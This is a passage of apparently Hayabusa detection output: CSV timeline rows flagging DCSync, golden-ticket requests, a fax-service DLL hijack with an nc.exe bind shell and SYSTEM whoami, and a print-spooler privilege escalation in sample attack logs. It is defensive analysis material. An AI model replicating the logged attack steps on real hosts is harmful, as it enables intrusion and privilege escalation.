21:04:02.850 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: 
ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-03 01:24:07.551 
+09:00,MSEDGEWIN10,7,high,Persis | Evas,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx +2020-08-03 01:24:07.559 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\pipey | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 864 | Tgt PGUID: 747F3D96-E309-5F26-0000-001021BC0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 820 | Tgt PGUID: 747F3D96-E309-5F26-0000-0010137B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 
(MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Users\IEUser\Tools\Misc\nc.exe | PID: 7836 | PGUID: 747F3D96-E8B8-5F26-0000-00100AA71A00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\FXSSVC.exe | PID: 5252 | PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x3e7 | PID: 8104 | PGUID: 747F3D96-E8BA-5F26-0000-001035BE1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 588 | PGUID: 747F3D96-E8BC-5F26-0000-0010F7C41A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-12 22:04:27.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\Temp\__SKIP_1E14 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.454 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\{A6F2FD48-5F14-4B5F-ACC3-8DE2ACD8E384} | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRVUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 
747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.INI | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File 
Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDNAMES.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDDTYPE.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHEM.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHMX.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.622 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old\1 | 
Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\blah\blah\phoneinfo.dll | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Suspicious Print Port | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\c:\blah\blah\phoneinfo.dll: (Empty) | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SPL | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-E8D1-5F33-0000-001007B63A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 
747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:28.521 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:19.719 +09:00,MSEDGEWIN10,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.23,rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1740 | PGUID: 747F3D96-E90A-5F33-0000-0010863C0100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3320 | PGUID: 747F3D96-E90C-5F33-0000-0010CB420200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent 
Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x41c24 | PID: 5128 | PGUID: 747F3D96-E920-5F33-0000-001043920A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | 